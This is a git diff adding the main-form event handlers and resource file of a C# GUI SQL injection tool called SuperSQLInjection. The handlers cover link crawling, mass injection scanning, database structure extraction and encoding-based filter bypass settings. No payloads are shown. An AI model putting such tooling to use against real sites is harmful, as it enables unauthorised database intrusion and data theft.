+ this.log_txt_request.Text = FileTool.readFileToString(Tools.httpLogPath + tag + "-request.txt");
+ String response = FileTool.readFileToString(Tools.httpLogPath + tag + "-response.txt");
+ if (!String.IsNullOrEmpty(response))
+ {
+ int index = response.IndexOf("\r\n\r\n");
+
+ if (index != -1)
+ {
+ this.webBro_log.Stop();
+ this.webBro_log.ScriptErrorsSuppressed = true;
+ this.log_txt_response.Text = response;
+ String html = response.Substring(index, response.Length - index);
+ this.webBro_log.DocumentText = html;
+ }
+
+
+ }
+ else
+ {
+ MessageBox.Show("没有读到详细HTTP日志,可能上一次清除记录时已清除!");
+ }
+ }
+ catch (Exception ee)
+ {
+ Tools.SysLog("查看详细HTTP日志,发生异常----" + ee.Message);
+ }
+ }
+ }
+
+ private ListViewColumnSorter data_dbs_lvw_lvwColumnSorter;
+ private bool sort = false;
+ private void data_dbs_lvw_data_ColumnClick(object sender, ColumnClickEventArgs e)
+ {
+ // 创建一个ListView排序类的对象,并设置listView1的排序器
+ data_dbs_lvw_lvwColumnSorter = new ListViewColumnSorter();
+ if (sort == false)
+ {
+ sort = true;
+ data_dbs_lvw_lvwColumnSorter.Order = SortOrder.Descending;
+ }
+ else
+ {
+ sort = false;
+ data_dbs_lvw_lvwColumnSorter.Order = SortOrder.Ascending;
+ }
+ data_dbs_lvw_lvwColumnSorter.SortColumn = e.Column;
+ this.data_dbs_lvw_data.ListViewItemSorter = data_dbs_lvw_lvwColumnSorter;
+ }
+
+ private ListViewColumnSorter scanInjection_lvw_result_lvwColumnSorter;
+ private bool ss_sort = false;
+ private void scanInjection_lvw_result_ColumnClick(object sender, ColumnClickEventArgs e)
+ {
+ // 创建一个ListView排序类的对象,并设置listView1的排序器
+ scanInjection_lvw_result_lvwColumnSorter = new ListViewColumnSorter();
+
+ if (ss_sort == false)
+ {
+ ss_sort = true;
+ scanInjection_lvw_result_lvwColumnSorter.Order = SortOrder.Descending;
+ }
+ else
+ {
+ ss_sort = false;
+ scanInjection_lvw_result_lvwColumnSorter.Order = SortOrder.Ascending;
+ }
+ scanInjection_lvw_result_lvwColumnSorter.SortColumn = e.Column;
+ this.scanInjection_lvw_result.ListViewItemSorter = scanInjection_lvw_result_lvwColumnSorter;
+ }
+
+ private void btn_inject_clearRequest_Click(object sender, EventArgs e)
+ {
+ this.mytab.SelectTab(1);
+ data_cms_tsmi_getVariable_Click(null, null);
+ }
+
+ private void file_txt_result_KeyDown(object sender, KeyEventArgs e)
+ {
+ if (e.Modifiers == Keys.Control && e.KeyCode == Keys.A)
+ {
+ ((TextBox)sender).SelectAll();
+ }
+ }
+
+ private void cmd_txt_result_KeyDown(object sender, KeyEventArgs e)
+ {
+ if (e.Modifiers == Keys.Control && e.KeyCode == Keys.A)
+ {
+ ((TextBox)sender).SelectAll();
+ }
+ }
+
+ private void encode_txt_result_KeyDown(object sender, KeyEventArgs e)
+ {
+ if (e.Modifiers == Keys.Control && e.KeyCode == Keys.A)
+ {
+ ((TextBox)sender).SelectAll();
+ }
+ }
+
+ private void bypass_chk_base64_CheckedChanged(object sender, EventArgs e)
+ {
+ config.base64 = this.bypass_chk_base64.Checked;
+ }
+
+ private void data_dbs_tsmi_addDBS_Click(object sender, EventArgs e)
+ {
+ addNode(1);
+
+ }
+
+ private void addNode(int type)
+ {
+
+ if (an != null)
+ {
+ an = new AddNode();
+ an.type = type;
+ an.tn = this.data_tvw_dbs.SelectedNode;
+ an.tvw = this.data_tvw_dbs;
+ an.ShowDialog();
+ }
+ else
+ {
+ an = new AddNode();
+ an.type = type;
+ an.tvw = this.data_tvw_dbs;
+ an.tn = this.data_tvw_dbs.SelectedNode;
+ an.ShowDialog();
+ }
+
+ }
+
+ private void data_dbs_tsmi_addTableOrColumn_Click(object sender, EventArgs e)
+ {
+ addNode(2);
+ }
+ private Thread spiderThread = null;
+ private void scanInjection_btn_spider_Click(object sender, EventArgs e)
+ {
+ if (addStatus != 0) {
+ MessageBox.Show("请稍候,还在加载地址列表!");
+ return;
+ }
+ if (this.scanInjection_btn_spider.Text.Equals("爬行链接"))
+ {
+ if (scan_list.Count <= 0)
+ {
+ MessageBox.Show("请导入域名!");
+ return;
+ }
+ if (MyThreadPool.getCurrentThreadCount() > 0)
+ {
+ MessageBox.Show("请稍候还有后台线程正在运行!");
+ return;
+ }
+ this.scanInject_lsb_links.Items.Clear();
+ spiderThread = new Thread(spider);
+ scanedDomain = 0;
+ this.scanInjection_btn_spider.Text = "停止爬行";
+ Main.status = 1;
+ spiderThread.Start();
+
+ }
+
+ else
+ {
+ if (this.spiderThread != null)
+ {
+ this.spiderThread.Abort();
+ Thread t = new Thread(stopSpider);
+ t.Start();
+ }
+ }
+ }
+
+ private void scanInjection_btn_scan_Click(object sender, EventArgs e)
+ {
+ if (addStatus != 0)
+ {
+ MessageBox.Show("请稍候,还在加载地址列表!");
+ return;
+ }
+ if (MyThreadPool.getCurrentThreadCount() <= 0)
+ {
+ if (this.scanInject_lsb_links.Items.Count > 0)
+ {
+
+ scanedURLSCount = 0;
+ this.scanInjection_btn_scan.Text = "停止扫描";
+ Main.status = 1;
+ scanedThread = new Thread(scan);
+ scanedThread.Start();
+ }
+ else {
+ MessageBox.Show("请先爬行或导入链接!");
+ }
+ }
+ else
+ {
+
+ if (this.scanedThread != null)
+ {
+ this.scanedThread.Abort();
+ Thread t = new Thread(stopScan);
+ t.Start();
+ }
+ }
+ }
+ private ListViewColumnSorter log_lvw_httpLog_lvwColumnSorter;
+ private bool log_sort = false;
+ private void log_lvw_httpLog_ColumnClick(object sender, ColumnClickEventArgs e)
+ {
+ // 创建一个ListView排序类的对象,并设置listView1的排序器
+ log_lvw_httpLog_lvwColumnSorter = new ListViewColumnSorter();
+ if (log_sort == false)
+ {
+ log_sort = true;
+ log_lvw_httpLog_lvwColumnSorter.Order = SortOrder.Descending;
+ }
+ else
+ {
+ log_sort = false;
+ log_lvw_httpLog_lvwColumnSorter.Order = SortOrder.Ascending;
+ }
+ log_lvw_httpLog_lvwColumnSorter.SortColumn = e.Column;
+ this.log_lvw_httpLog.ListViewItemSorter = log_lvw_httpLog_lvwColumnSorter;
+ }
+
+ private void cbox_basic_timeOut_TextChanged(object sender, EventArgs e)
+ {
+ config.timeOut = int.Parse(this.cbox_basic_timeOut.Text);
+ }
+
+ private void cbox_basic_encoding_TextChanged(object sender, EventArgs e)
+ {
+ config.encoding = this.cbox_basic_encoding.Text;
+ }
+
+ private void cbox_basic_threadSize_TextChanged(object sender, EventArgs e)
+ {
+ config.threadSize = int.Parse(this.cbox_basic_threadSize.Text);
+ MyThreadPool.setMaxThread(config.threadSize);
+ }
+
+ private void cbox_basic_reTryCount_TextChanged(object sender, EventArgs e)
+ {
+ config.reTry = int.Parse(this.cbox_basic_reTryCount.Text);
+ }
+
+ private void tsmi_exportScanInjectionURL_Click(object sender, EventArgs e)
+ {
+ try
+ {
+ //保存文件
+ SaveFileDialog saveFileDialog = new SaveFileDialog();
+ saveFileDialog.Filter = "文本文件|*.txt";
+ if (saveFileDialog.ShowDialog() == DialogResult.OK)
+ {
+ FileStream fs = new FileStream(saveFileDialog.FileName.ToString(), FileMode.OpenOrCreate, FileAccess.Write);
+ StreamWriter sw = new StreamWriter(fs);
+ foreach (String url in this.scanInject_lsb_links.Items)
+ {
+ sw.WriteLine(url);
+ }
+ sw.Close();
+ MessageBox.Show("导出完成!");
+ }
+
+ }
+ catch (Exception ee)
+ {
+
+ MessageBox.Show("导出异常!" + ee.Message);
+
+ }
+
+ }
+
+ private void tsmi_clearScanInjectionURL_Click(object sender, EventArgs e)
+ {
+ this.scanInject_lsb_links.Items.Clear();
+ this.scan_list.Clear();
+ this.scanInjection_domainsCount.Text = "0";
+ this.urlSumCount = 0;//待扫url
+ this.scanedURLSCount = 0;//已扫
+ this.scanedDomain = 0;//爬行到URL
+
+ }
+
+ private void encode_txt_input_KeyDown(object sender, KeyEventArgs e)
+ {
+ if (e.Modifiers == Keys.Control && e.KeyCode == Keys.A)
+ {
+ ((TextBox)sender).SelectAll();
+ }
+ }
+
+ private void tsmi_readme_Click(object sender, EventArgs e)
+ {
+ MessageBox.Show("查看程序包!");
+ }
+
+ private void cbox_file_readFileEncoding_SelectedValueChanged(object sender, EventArgs e)
+ {
+ config.readFileEncoding = this.cbox_file_readFileEncoding.Text;
+ }
+
+ private void toolStrip1_TextChanged(object sender, EventArgs e)
+ {
+ config.db_encoding = this.data_dbs_cob_db_encoding.Text;
+ }
+
+ private void 版本ToolStripMenuItem_Click(object sender, EventArgs e)
+ {
+ MessageBox.Show("V1.0正式版----" + version);
+ }
+
+ private void data_dbs_tsmi_saveDTCStruct_Click(object sender, EventArgs e)
+ {
+ try
+ {
+ DataBase dbs = new DataBase();
+ SerializableDictionary>> db_tables = new SerializableDictionary>>();
+ foreach (TreeNode db in this.data_tvw_dbs.Nodes)
+ {
+ SerializableDictionary> stable = new SerializableDictionary>();
+ if (db.Nodes.Count <= 0)
+ {
+ stable.Add("", new List());
+ }
+ foreach (TreeNode table in db.Nodes)
+ {
+ List columns = new List();
+ foreach (TreeNode column in table.Nodes)
+ {
+ columns.Add(column.Text);
+ }
+ stable.Add(table.Text, columns);
+ }
+ db_tables.Add(db.Text, stable);
+ }
+ dbs.tables = db_tables;
+ //保存文件
+ SaveFileDialog saveFileDialog = new SaveFileDialog();
+ saveFileDialog.Filter = "文本文件|*.xml";
+ if (saveFileDialog.ShowDialog() == DialogResult.OK)
+ {
+ export = 1;
+ Thread eth = new Thread(exportData);
+ }
+ XML.saveDBS(saveFileDialog.FileName, dbs);
+ MessageBox.Show("保存成功!");
+ }
+ catch (Exception ke)
+ {
+
+ log("\r\n加载异常----" + ke.Message + "\r\n");
+ }
+ }
+
+ private void data_dbs_tsmi_loadDTCStruct_Click(object sender, EventArgs e)
+ {
+ try
+ {
+ OpenFileDialog ofd = new OpenFileDialog { Filter = "XML文件(*.xml)|*.*" };
+ if (ofd.ShowDialog() == DialogResult.OK)
+ {
+
+ DataBase dbs = XML.readDBS(ofd.FileName);
+ foreach (KeyValuePair>> sdb in dbs.tables)
+ {
+ if (Tools.isExistsNode(this.data_tvw_dbs.Nodes, sdb.Key))
+ {
+ log("数据库" + sdb.Key + "已在列表中,无法再次添加如果要添加请先删除原数据库!");
+ continue;
+ }
+ TreeNode dbtn = new TreeNode(sdb.Key);
+ dbtn.Tag = "dbs";
+ foreach (KeyValuePair> tables in sdb.Value)
+ {
+ if (String.IsNullOrEmpty(tables.Key))
+ {
+ continue;
+ }
+ TreeNode tabletn = new TreeNode(tables.Key);
+ tabletn.Tag = "table";
+ dbtn.Nodes.Add(tabletn);
+ foreach (String column in tables.Value)
+ {
+ if (String.IsNullOrEmpty(column))
+ {
+ continue;
+ }
+ TreeNode columntn = new TreeNode(column);
+ columntn.Tag = "column";
+ tabletn.Nodes.Add(columntn);
+ }
+ }
+ this.data_tvw_dbs.Nodes.Add(dbtn);
+ }
+ MessageBox.Show("加载库表列信息成功!");
+ }
+ }
+ catch (Exception ke)
+ {
+
+ log("\r\n加载异常----" + ke.Message + "\r\n");
+ }
+ }
+
+ private void data_dbs_tsmi_clearDTCStruct_Click(object sender, EventArgs e)
+ {
+ this.data_tvw_dbs.Nodes.Clear();
+ }
+
+ private void cbox_inject_type_SelectedIndexChanged(object sender, EventArgs e)
+ {
+ int c = this.cbox_inject_type.SelectedIndex;
+ switch (c)
+ {
+ case 0:
+ config.keyType = KeyType.Key;
+ break;
+ case 1:
+ config.keyType = KeyType.Code;
+ break;
+ case 2:
+ config.keyType = KeyType.Length;
+ break;
+ case 3:
+ config.keyType = KeyType.Time;
+ break;
+
+ }
+ }
+
+ private void tsmi_createGetTemplate_Click(object sender, EventArgs e)
+ {
+ this.txt_inject_request.Text = HTTP.getTemplate;
+ }
+
+ private void tsmi_createPOSTTemplate_Click(object sender, EventArgs e)
+ {
+ this.txt_inject_request.Text = HTTP.postTemplate;
+ }
+
+ private void tsmi_changeRequestMethod_Click(object sender, EventArgs e)
+ {
+ this.txt_inject_request.Text = Tools.changeRequestMethod(this.txt_inject_request.Text);
+ }
+
+ private void tsmi_clearColumns_Click(object sender, EventArgs e)
+ {
+ this.data_dbs_lvw_data.Clear();
+ }
+
+ private void tsmi_bugReport_Click(object sender, EventArgs e)
+ {
+ MessageBox.Show("邮箱反馈:1341413415@qq.com\r\nQQ群反馈:84978967");
+ }
+
+ private void data_dbs_cob_db_encoding_TextChanged(object sender, EventArgs e)
+ {
+ this.config.db_encoding = this.data_dbs_cob_db_encoding.Text;
+ }
+
+ private void cob_keyRepalce_SelectedIndexChanged(object sender, EventArgs e)
+ {
+ config.keyReplace = this.cob_keyRepalce.SelectedIndex;
+ }
+
+ private void chk_reaplaceBeforURLEncode_CheckedChanged(object sender, EventArgs e)
+ {
+ config.reaplaceBeforURLEncode = this.chk_reaplaceBeforURLEncode.Checked;
+ }
+
+ private void tsmi_createPackByURL_Click(object sender, EventArgs e)
+ {
+ try {
+ Uri url = new Uri(config.request);
+ this.txt_inject_request.Text=Spider.reqestGetTemplate.Replace("{url}", url.PathAndQuery).Replace("{host}", url.Host+":"+ url.Port);
+ this.txt_basic_host.Text = url.Host;
+ this.txt_basic_port.Text = url.Port.ToString();
+ if (config.request.StartsWith("https")) {
+ this.chk_useSSL.Checked = true;
+ }
+ }catch (Exception ee) {
+ MessageBox.Show("请在数据包中输入正确的URL地址,如:http://www.baidu.com/index.php?id=1");
+ }
+
+ }
+
+ private void tsmi_tsmi_opentestURL_Click(object sender, EventArgs e)
+ {
+ openScanURL(2);
+ }
+
+ private void tsmi_openURL_Click(object sender, EventArgs e)
+ {
+ openScanURL(1);
+ }
+
+ private void bypass_btn_saveTemplate_Click(object sender, EventArgs e)
+ {
+ SaveFileDialog saveFileDialog = new SaveFileDialog();
+ saveFileDialog.Filter = "XML文件|*.xml";
+ if (saveFileDialog.ShowDialog() == DialogResult.OK)
+ {
+ XML.saveConfig(saveFileDialog.FileName, config);
+ MessageBox.Show("保存模板成功!");
+ }
+ }
+
+ public void loadTemplate(String templatePath) {
+ try
+ {
+ Config template = XML.readConfig(templatePath);
+
+ //bypass
+ this.bypass_chk_inculdeStr.Checked = template.inculdeStr;
+ this.cob_keyRepalce.SelectedIndex = template.keyReplace;
+ this.bypass_chk_base64.Checked = template.base64;
+ this.cbox_base64Count.SelectedIndex = config.base64Count;
+ //替换字符
+ this.chk_reaplaceBeforURLEncode.Checked = template.reaplaceBeforURLEncode;
+ String[] replaceStrs = Regex.Split(template.replaceStrs, "\\n");
+ if (replaceStrs.Length > 0)
+ {
+ foreach (String line in replaceStrs)
+ {
+ String[] strs = Regex.Split(line, "\\t");
+ if (strs.Length == 2)
+ {
+ if (!String.IsNullOrEmpty(strs[0])&& !replaceList.ContainsKey(strs[0]))
+ {
+ this.replaceList.Add(strs[0], strs[1]);
+ ListViewItem lvi = new ListViewItem(strs[0]);
+ lvi.SubItems.Add(strs[1]);
+ lvi.Name = strs[1];
+ this.bypass_lvw_replaceString.Items.Add(lvi);
+ config.replaceStrs += (strs[0] + "\t" + strs[1] + "\n");
+ }
+ }
+ }
+ }
+ MessageBox.Show("加载模板完成!");
+
+ }
+ catch (Exception e)
+ {
+ Tools.SysLog("加载模板发生异常!"+e.Message);
+ MessageBox.Show("加载模板发生异常!");
+ }
+ }
+
+ private void bypass_cbox_loadTemplate_TextChanged(object sender, EventArgs e)
+ {
+ if (this.bypass_cbox_loadTemplate.SelectedIndex == 0)
+ {
+ OpenFileDialog ofd = new OpenFileDialog { Filter = "XML文件(*.xml)|*.*" };
+ if (ofd.ShowDialog() == DialogResult.OK)
+ {
+ loadTemplate(ofd.FileName);
+ }
+ }
+ else {
+ String path = AppDomain.CurrentDomain.BaseDirectory + "/config/template/" + this.bypass_cbox_loadTemplate.Text;
+ loadTemplate(path);
+
+ }
+ }
+
+ private void cbox_base64Count_TextChanged(object sender, EventArgs e)
+ {
+ config.base64Count = this.cbox_base64Count.SelectedIndex+1;
+ }
+
+ private void tsmi_tsmi_exortTestURL_Click(object sender, EventArgs e)
+ {
+ exportScanURL(new int[] { 2});
+ }
+
+ private void tsmi_tsmi_exortOldURL_Click(object sender, EventArgs e)
+ {
+ exportScanURL(new int[] {1});
+ }
+
+ private void cbox_bypass_urlencode_count_TextChanged(object sender, EventArgs e)
+ {
+ config.urlencodeCount = this.cbox_bypass_urlencode_count.SelectedIndex + 1;
+ }
+ }
+}
\ No newline at end of file
diff --git a/SuperSQLInjection/Main.resx b/SuperSQLInjection/Main.resx
new file mode 100644
index 0000000..f60ea5a
--- /dev/null
+++ b/SuperSQLInjection/Main.resx
@@ -0,0 +1,414 @@
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ text/microsoft-resx
+
+
+ 2.0
+
+
+ System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
+
+
+ System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
+
+
+ 142, 6
+
+
+ 9, 6
+
+
+ 531, 14
+
+
+
+ AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4w
+ LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACZTeXN0
+ ZW0uV2luZG93cy5Gb3Jtcy5JbWFnZUxpc3RTdHJlYW1lcgEAAAAERGF0YQcCAgAAAAkDAAAADwMAAAAC
+ EwAAAk1TRnQBSQFMAgEBCgEAARgBBgEYAQYBEAEAARABAAT/AQkBAAj/AUIBTQE2AQQGAAE2AQQCAAEo
+ AwABQAMAATADAAEBAQABCAYAAQwYAAGAAgABgAMAAoABAAGAAwABgAEAAYABAAKAAgADwAEAAcAB3AHA
+ AQAB8AHKAaYBAAEzBQABMwEAATMBAAEzAQACMwIAAxYBAAMcAQADIgEAAykBAANVAQADTQEAA0IBAAM5
+ AQABgAF8Af8BAAJQAf8BAAGTAQAB1gEAAf8B7AHMAQABxgHWAe8BAAHWAucBAAGQAakBrQIAAf8BMwMA
+ AWYDAAGZAwABzAIAATMDAAIzAgABMwFmAgABMwGZAgABMwHMAgABMwH/AgABZgMAAWYBMwIAAmYCAAFm
+ AZkCAAFmAcwCAAFmAf8CAAGZAwABmQEzAgABmQFmAgACmQIAAZkBzAIAAZkB/wIAAcwDAAHMATMCAAHM
+ AWYCAAHMAZkCAALMAgABzAH/AgAB/wFmAgAB/wGZAgAB/wHMAQABMwH/AgAB/wEAATMBAAEzAQABZgEA
+ ATMBAAGZAQABMwEAAcwBAAEzAQAB/wEAAf8BMwIAAzMBAAIzAWYBAAIzAZkBAAIzAcwBAAIzAf8BAAEz
+ AWYCAAEzAWYBMwEAATMCZgEAATMBZgGZAQABMwFmAcwBAAEzAWYB/wEAATMBmQIAATMBmQEzAQABMwGZ
+ AWYBAAEzApkBAAEzAZkBzAEAATMBmQH/AQABMwHMAgABMwHMATMBAAEzAcwBZgEAATMBzAGZAQABMwLM
+ AQABMwHMAf8BAAEzAf8BMwEAATMB/wFmAQABMwH/AZkBAAEzAf8BzAEAATMC/wEAAWYDAAFmAQABMwEA
+ AWYBAAFmAQABZgEAAZkBAAFmAQABzAEAAWYBAAH/AQABZgEzAgABZgIzAQABZgEzAWYBAAFmATMBmQEA
+ AWYBMwHMAQABZgEzAf8BAAJmAgACZgEzAQADZgEAAmYBmQEAAmYBzAEAAWYBmQIAAWYBmQEzAQABZgGZ
+ AWYBAAFmApkBAAFmAZkBzAEAAWYBmQH/AQABZgHMAgABZgHMATMBAAFmAcwBmQEAAWYCzAEAAWYBzAH/
+ AQABZgH/AgABZgH/ATMBAAFmAf8BmQEAAWYB/wHMAQABzAEAAf8BAAH/AQABzAEAApkCAAGZATMBmQEA
+ AZkBAAGZAQABmQEAAcwBAAGZAwABmQIzAQABmQEAAWYBAAGZATMBzAEAAZkBAAH/AQABmQFmAgABmQFm
+ ATMBAAGZATMBZgEAAZkBZgGZAQABmQFmAcwBAAGZATMB/wEAApkBMwEAApkBZgEAA5kBAAKZAcwBAAKZ
+ Af8BAAGZAcwCAAGZAcwBMwEAAWYBzAFmAQABmQHMAZkBAAGZAswBAAGZAcwB/wEAAZkB/wIAAZkB/wEz
+ AQABmQHMAWYBAAGZAf8BmQEAAZkB/wHMAQABmQL/AQABzAMAAZkBAAEzAQABzAEAAWYBAAHMAQABmQEA
+ AcwBAAHMAQABmQEzAgABzAIzAQABzAEzAWYBAAHMATMBmQEAAcwBMwHMAQABzAEzAf8BAAHMAWYCAAHM
+ AWYBMwEAAZkCZgEAAcwBZgGZAQABzAFmAcwBAAGZAWYB/wEAAcwBmQIAAcwBmQEzAQABzAGZAWYBAAHM
+ ApkBAAHMAZkBzAEAAcwBmQH/AQACzAIAAswBMwEAAswBZgEAAswBmQEAA8wBAALMAf8BAAHMAf8CAAHM
+ Af8BMwEAAZkB/wFmAQABzAH/AZkBAAHMAf8BzAEAAcwC/wEAAcwBAAEzAQAB/wEAAWYBAAH/AQABmQEA
+ AcwBMwIAAf8CMwEAAf8BMwFmAQAB/wEzAZkBAAH/ATMBzAEAAf8BMwH/AQAB/wFmAgAB/wFmATMBAAHM
+ AmYBAAH/AWYBmQEAAf8BZgHMAQABzAFmAf8BAAH/AZkCAAH/AZkBMwEAAf8BmQFmAQAB/wKZAQAB/wGZ
+ AcwBAAH/AZkB/wEAAf8BzAIAAf8BzAEzAQAB/wHMAWYBAAH/AcwBmQEAAf8CzAEAAf8BzAH/AQAC/wEz
+ AQABzAH/AWYBAAL/AZkBAAL/AcwBAAJmAf8BAAFmAf8BZgEAAWYC/wEAAf8CZgEAAf8BZgH/AQAC/wFm
+ AQABIQEAAaUBAANfAQADdwEAA4YBAAOWAQADywEAA7IBAAPXAQAD3QEAA+MBAAPqAQAD8QEAA/gBAAHw
+ AfsB/wEAAaQCoAEAA4ADAAH/AgAB/wMAAv8BAAH/AwAB/wEAAf8BAAL/AgAD/wEAAfEB7wG8AfMC9AT/
+ AvQBkwFvAQcNAAH/AfQiAAHvAfIB9wG8B/8BkwFvAZQBbwwAAfACDgHvIQAB8QH3AfEB9wHxBQABkwFv
+ ARYBbwEHBQAG/wHyAQ4BQwEUAQ4B8yEAAfEB7wHwAe8B8QMAAZMBbwEWAW8BGgUAAv8B8QHvAewB7QH3
+ AewBEQIUAQ4B/yIAAfEB7wG8Ae8B8QEAAZMBbwEWAW8BGgUAAf8B9AEHAe8B8AHzAfIB8AH3AW0BEwEP
+ AQckAAHxAe8BvAEHAbwBbwHjAW8BGgYAAf8CBwHwAbQCiwG0AfABBwFtAe8mAAHxAQcBbwFFAeMBFgEa
+ BwAB8gHvAfEBigSyAa0B8gHvAfInAAHxAUYBlAFGAbwIAAEHAfEBtAGzBbIBtAHxAQcnAAEHARwCbwEH
+ Au8BBwHwAf8DAAH3AfQGswGyAbMB9AH3JgACBwG8AfIBvAIHArwCBwH/AgAB7wH0AbMBuQazAfQB7yUA
+ AQcCvAEAAf8BvAIHAbwB7wHxAQcB8QIAAQcB8gG6AbkB2wHaAtsBuQG6AfIBByQAAQcCvAMAAfACvAHv
+ AfMBBwHyAfACAAHzAQcB9AGzBNsBswHzAQcB8yIAAfEBBwLwBAAB8QHwAe8B8wEAAf8B8AHxAwAB8QHw
+ AfMBugG0AroB8wLxIwABvAHzAfAFAAHyAbwB8QHvAf8BAAL/AwAB/wHxAQcB8wH0Af8B8wG8AfEB/yMA
+ AfIB8QHyBQAB/wHxAfAB8gG8Af8HAAHzAfACBwHwAfMuAAH/AfMC8QH/NAAB/wG0AgABBwgSAQcQ/wES
+ BBUB/wFDASoC/wHvAhUBEhIAAbUEzwEAAeoI/wHqAf8O1AH/AW0F/wEqAfYCIwP/AW0SAAHPAQAB/wG0
+ AgABbQH/AvQE8wH/AW0B/wHUAtwBGQL0ARkB3AHbAdoB0wHUAdsB1AH/AW0B/wPzAf8BKgH2AcMBegGm
+ Av8BbQIAAuwEAAPsBAAC7AEAAc8FAAFtAf8B9AXzAf8BbQH/AdQC3AEZAvQBGQHcAdsB2gHTAdQB2wHU
+ Af8BbQH/A/QC/wEqAXoBswHTAaYB/wEHAgAB7AH/BOwB/wHsAf8E7AH/AewHAAHrAf8G8wH/AesB/wHU
+ AhkB9AL/AfQBGQEJA9wBCQHUAf8B6wH/BPQB/wEqAQkB4gGzAdMBpgL/AQAB7AX/AewB/wHsBf8B7AEA
+ AbsFbAHsAf8G8wH/AewB/w7UAf8B6wH/BPQC/wGsAQkB4gGzAdMBpgL/AewG/wHsBv8B7AEAAYsFGQHs
+ Af8G8wH/AewB/wHUAtwBGQL0ARkB3AHbAdoB0wHUAdsB1AH/AesB/wX0Av8BrAEJAeIBswHTAaYB/wHs
+ Af8B7AH/AewB/wHsAf8B7AX/AewBAAGLBRkB7AH/BPMD/wHsAf8B1ALcARkC9AEZAdwB2wHaAdMB1AHb
+ AdQB/wHrCf8BrAEJAeIBswEmASAB7AL/AewD/wHsBv8B7AEAAZAFGQHtAf8E8wH/Au0B8AH/AdQC3AEZ
+ AvQBGQHcAdsB2gHTAdQB2wHUAf8B7Ar/AawBCQH/ASYBIAHsAf8B7AP/AewB/wHsBf8B7AEAAZAFGQGS
+ Bv8BkgEHAQAB/wHUAhkB9AL/AfQBGQEJA9wBCQHUAf8B7Av/AawBJgHeASUB7AL/AuwC/wHsBv8B7AEA
+ AbMFGQEHBvcB8AIAAf8O1AH/AewJ/wL0Af8BJQEgAf8B7AH/AewD/wHsAf8B7AX/AewBAAGzBRkCCQEZ
+ AbMGAAH/AdQC3AEZAvQBGQHcAdsB2gHTAdQB2wHUAf8B7Aj/AbUC6gEHA/8B7AL/AuwC/wHsBv8B7AEA
+ AbkEGQEJAxkBuQQAAc8BAAH/AdQC3AEZAvQBGQHcAdsB2gHTAdQB2wHUAf8B7Aj/AbUD/wH3AgAC7AT/
+ AewB/wHsBP8C7AEAAbkDGQIJARkCuQEJAf8BtAIAAc8BAAH/AdQCGQH0Av8B9AEZAQkD3AEJAdQB/wHs
+ CP8BtQL/AfcFAATsAQAB7AEABOwDAAG5BhkBuQG6AQAEzwG1AQAB/w7UAf8B7Qj/AbUB/wH3FAABCQa5
+ AQkCAAH/AbQEABD/Cu0B90gAAvABvAHvApEB7wG8AvAHAAEHAXIBTwNJAXIBBwUADv8DAAG8DAABBwIA
+ AbwBBwH3Ae8BswLbAbMC7wEHAbwFAAGYAU8BUASYAU8BSQEcBAABBwzrAQcCAAHzAQACBwr/AgAB8AG7
+ ArMBkAG6AtsBugGQArMBuwHwAwABmAFPAXgBCAGYApcBmAEIAZcBSQEcAwAB6wwHAesFAAP0CP8CAAHw
+ AbQC3AbbAtwBtAHwAgABBwFPAXgBCAaXAQgBlwFJAQcCAAHsAbwKDwG8AewCAAHzAQACBwP0B/8CAAG8
+ AbMB3ALbAdwC2wHcAtsB3AGzAbwCAAF4AVYBCAKXAXgBGwGYA5cBCAFPAXICAAHsAfAKEAHwAewFAAP0
+ AesBDgEQAewBEQP/AQABvAHvAbQD2wGzAroBswPbAbQB7wG8AQABUAKYAZcBeAP/AZgClwKYAU8CAAHs
+ AfEBEAIRAv8BEQH/AhEBEAHxAewCAAHzAQACBwH0AfABAAHwAfQB7QEAA/8BAAEHAbMBugHbAdwBswG8
+ AgABvAGzAdwB2wG6AbMBBwEAAU8BmAGXAXgC/wH0Av8BmAKXAZgBSQIAAewB8QERAUMB/wZDAREB8QHs
+ BQAC8wHyAQ4B7AHzAbwBAAH0Av8BAAG7AdsC3AHbAbQEAAG0AdsC3AHbAbsBAAFVAQgBeAGXAQgB8QGX
+ AQgC/wGYAZcBmAFPAgAB7AHyAREBFQH/AxUB/wIVAREB8gHsAgAB8wEAAQcB7wLzAQcBEwEOAQ8BAAL0
+ Af8BAAG7AdsD3AG0AbwC8AG8AbQD3AHbAbsBAAFWApgFlwEIAf8B8wKYAU8CAAHsAfMBQwIVAv8EFQFD
+ AfMB7AUAA/MBvAHyAfQB7AEQA/QBAAG8AbMC2wHcAbMBkgIHAZIBswHcAtsBswG8AQABmAGXAQgGlwEI
+ AZcBCAFQAZcCAAHsAfQBQwgUAUMB9AHsAgAB8wEAAQcB7wLzAewBDwEOAREB7wP0AgABvAG0AdsB4QHc
+ AbMCkAGzAdwB4QHbAbQBvAIAAQgBVgF4AQgGlwEIAXgBTwEHAgAB7QH/CkMB/wHtBQAB8gfzA/QCAAG8
+ AbMBGQPhAtwD4QEZAbMBvAMAAZgBVgF4AQgBmAJ4AZgBCAF4AU8BmAMAAe0M/wHtAgAB8wEAAQcB7wLy
+ BvMC9AMAAbQB3AHiAtsC4QLbAeIB3AG0BQABmAFWAZcEmAGXAVABmAQAAfAM7QHwBQAE8gfzAwABuwG0
+ AbMBtAHbAuIB2wG0AbMBtAG7BgABCAGYBFYBmAEHFQAB8wEADP8FAAK8AbMC2wGzArwmAAG8DAABvAYA
+ AbwCuwG8BgABQgFNAT4HAAE+AwABKAMAAUADAAEwAwABAQEAAQEFAAGAAQEWAAP/AgABAQH/AfMFAAEB
+ Af8B4QQAAQcBwQHwBQACgwHgBQABwQEHAcABAQQAAeABDwHAAQMEAAHwAR8BwAEDBAAB+AE/AcABAwQA
+ AfgBAQHAAQMEAAHwAQABwAEDBAAB4gEAAcABAwQAAccBAAHAAQMEAAEPAQgB4AEHBAABHwEEAeABBwQA
